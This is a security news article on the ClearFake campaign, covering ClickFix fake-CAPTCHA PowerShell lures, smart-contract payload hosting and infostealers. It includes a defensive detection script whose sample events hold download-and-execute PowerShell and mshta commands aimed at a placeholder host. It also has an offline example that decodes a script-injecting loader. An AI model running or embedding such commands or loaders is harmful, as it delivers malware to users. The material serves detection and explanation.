
Cybercriminals behind the ClearFake campaign continue to refine their attack techniques, now employing fake reCAPTCHA and Cloudflare Turnstile verification pages to push malware onto visitors. Since July 2023, the group has used compromised WordPress sites to serve fake browser-update prompts whose "update" is in fact a malware installer.
A newly observed variant uses the ClickFix method: the page copies a command to the victim's clipboard and instructs them to paste it into the Run dialog or a PowerShell window, so the victim runs the malicious PowerShell themselves under the guise of resolving a nonexistent technical issue.
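Because the victim launches the interpreter by hand, ClickFix leaves a distinctive footprint: a PowerShell, mshta or cmd process whose parent is explorer.exe (the Run dialog) and whose command line carries a download cradle, a hidden-window switch or fake-CAPTCHA wording. The following is an added detection example, not code from Sekoia's report or from the campaign itself; the process-creation events are constructed to resemble Sysmon Event ID 1 records, the URLs use the reserved `example.invalid` domain, and the indicator weights and the threshold are this example's own choices.

```python
import re

# Constructed process-creation events in the style of Sysmon Event ID 1; not real telemetry.
SAMPLE_EVENTS = [
    {  # ClickFix-style launch from the Run dialog
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": 'powershell -w hidden -c "iex (iwr -UseBasicParsing https://example.invalid/v.txt)"'
                   ' # I am not a robot - reCAPTCHA Verification ID: 7281',
    },
    {  # mshta pulling a remote HTA, also typed into Win+R
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\mshta.exe",
        "cmdline": "mshta https://example.invalid/verify.hta",
    },
    {  # a user simply opening an interactive PowerShell: must not fire
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell",
    },
    {  # scripted admin task from cmd.exe: must not fire
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -NoProfile -Command Get-ChildItem C:\\logs",
    },
]

# explorer.exe is the parent when a command is typed into Win+R.
USER_LAUNCHERS = {"explorer.exe"}
TARGET_IMAGES = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe"}

# (pattern, label, weight); matched against the lower-cased command line.
INDICATORS = [
    (r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", "download cradle", 2),
    (r"\b(iex|invoke-expression)\b", "in-memory execution", 2),
    (r"-(w|windowstyle)\s+h(idden)?\b", "hidden window", 1),
    (r"-(e|enc|encodedcommand)\s+[a-z0-9+/=]{20,}", "encoded command", 2),
    (r"\bmshta(\.exe)?\s+https?://", "mshta remote payload", 3),
    (r"not a robot|verification id|captcha", "fake-CAPTCHA wording", 2),
]
THRESHOLD = 3  # example value; tune against your own baseline


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, matched indicator labels) for one process-creation event."""
    cmd = event["cmdline"].lower()
    hits = [label for pat, label, _ in INDICATORS if re.search(pat, cmd)]
    score = sum(w for pat, _, w in INDICATORS if re.search(pat, cmd))
    # An interpreter launched straight from the shell is weak evidence on its own,
    # so it only adds one point; a plain "powershell" from Win+R stays below threshold.
    if _basename(event["parent"]) in USER_LAUNCHERS and _basename(event["image"]) in TARGET_IMAGES:
        score += 1
    return score, hits


def triage(events: list[dict]) -> list[tuple[int, int, list[str]]]:
    """Flag events that look like a ClickFix launch: user-driven parent plus enough indicators."""
    flagged = []
    for idx, ev in enumerate(events):
        score, hits = score_event(ev)
        if score >= THRESHOLD and _basename(ev["parent"]) in USER_LAUNCHERS:
            flagged.append((idx, score, hits))
    return flagged


if __name__ == "__main__":
    for idx, score, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score={score} indicators={hits}")
        print(f"  {SAMPLE_EVENTS[idx]['cmdline']}")
```

The same indicators can be applied retroactively to the Run dialog history at `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, which keeps the commands a user has pasted into Win+R even after the process has exited.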
According to Sekoia, the threat actors have also adopted EtherHiding, a technique that enables them to deploy malicious scripts via Binance Smart Chain (BSC) smart contracts. This approach enhances the attack’s resilience against detection and takedown efforts.
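What makes EtherHiding resilient is that the injected loader never sends a transaction: it issues a read-only `eth_call` to a public BSC JSON-RPC endpoint, receives the contract's return value, and ABI-decodes the string it contains into the next-stage script. There is no hosting provider to contact for a takedown, and the operator retargets every compromised site with a single contract write. The following added example (not code from the campaign or from Sekoia) builds that RPC request and decodes the response offline; the contract address and function selector are hypothetical placeholders, the returned script is a constructed stand-in, and bsc-dataseed.binance.org is used only as an illustrative public endpoint, since this page does not name the ones the loaders use.

```python
import json

# Hypothetical values for illustration only: not a real contract or a real selector.
CONTRACT = "0x" + "ab" * 20
SELECTOR = "0x20965255"  # placeholder 4-byte function selector
RPC_URL = "https://bsc-dataseed.binance.org/"  # illustrative public BSC JSON-RPC endpoint


def build_eth_call(contract: str, selector: str, rpc_id: int = 1) -> str:
    """JSON-RPC body a loader would POST to read the contract's return value.

    eth_call executes the view function locally on the node: no transaction, no gas,
    nothing written to the chain, so the fetch itself is invisible on-chain.
    """
    return json.dumps({
        "jsonrpc": "2.0",
        "id": rpc_id,
        "method": "eth_call",
        "params": [{"to": contract, "data": selector}, "latest"],
    })


def abi_encode_string(payload: bytes) -> bytes:
    """ABI encoding of a single dynamic `string` return value: head offset, length, padded data."""
    head = (32).to_bytes(32, "big")            # offset of the string data after the head word
    length = len(payload).to_bytes(32, "big")
    padding = b"\x00" * ((-len(payload)) % 32)  # data is right-padded to a 32-byte boundary
    return head + length + payload + padding


def abi_decode_string(result_hex: str) -> bytes:
    """Decode the `result` field of an eth_call response that returns one `string`."""
    data = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(data) < 64:
        raise ValueError("result too short for an ABI-encoded string")
    offset = int.from_bytes(data[0:32], "big")
    length = int.from_bytes(data[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(data):
        raise ValueError("truncated ABI string")
    return data[start:start + length]


# Constructed stand-in for the contract's stored value; the real campaign keeps a loader script here.
CONSTRUCTED_PAYLOAD = (
    b'var s=document.createElement("script");'
    b's.src="https://example.invalid/stage2.js";document.head.appendChild(s);'
)


def simulated_rpc_response(rpc_id: int = 1) -> str:
    """Stand-in for the node's reply, so the example runs without network access."""
    return json.dumps({
        "jsonrpc": "2.0",
        "id": rpc_id,
        "result": "0x" + abi_encode_string(CONSTRUCTED_PAYLOAD).hex(),
    })


def extract_payload(response_json: str) -> bytes:
    """What the injected loader does next: pull the script out of the response and eval it."""
    return abi_decode_string(json.loads(response_json)["result"])


if __name__ == "__main__":
    print("request to", RPC_URL)
    print(build_eth_call(CONTRACT, SELECTOR))
    print("decoded next stage:", extract_payload(simulated_rpc_response()).decode())
```

For defenders, the useful signal is the request rather than the contract: a browser session on a site with no cryptocurrency functionality posting `eth_call` bodies to a BSC RPC endpoint is worth alerting on, and the contract address in the `to` field is a stable indicator as long as the operator keeps reusing it.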
The primary objective of these attacks is to distribute infostealers such as Lumma Stealer and Vidar Stealer, with both Windows and macOS users targeted. As of May 2024, over 9,300 websites had been compromised by ClearFake, potentially exposing around 200,000 users to phishing lures and malware infections.
A particularly notable incident involved car dealerships, where malicious code reached their sites through a third-party video service, LES Automotive. This is a supply chain attack: rather than breaching each dealership, the threat actors compromised a script that many sites load, so a single intrusion reached every site embedding it.
Parallel to ClearFake, researchers have observed phishing campaigns leveraging virtual hard disks (VHDs) and Microsoft Excel vulnerabilities to propagate Venom RAT, AsyncRAT, and Remcos RAT. Additionally, misconfigurations in Microsoft 365 are being exploited to hijack user accounts and bypass multi-factor authentication (MFA).
Experts warn that Adversary-in-the-Middle (AitM) and Browser-in-the-Middle (BitM) attacks are becoming increasingly sophisticated: the attacker relays the victim's login, including the one-time code or push approval, to the real service and captures the resulting session cookie, so conventional MFA does not stop the session hijack. Phishing-resistant, origin-bound factors such as FIDO2/WebAuthn keys hold up against this relay because the credential is bound to the legitimate origin and cannot be replayed from the attacker's proxy.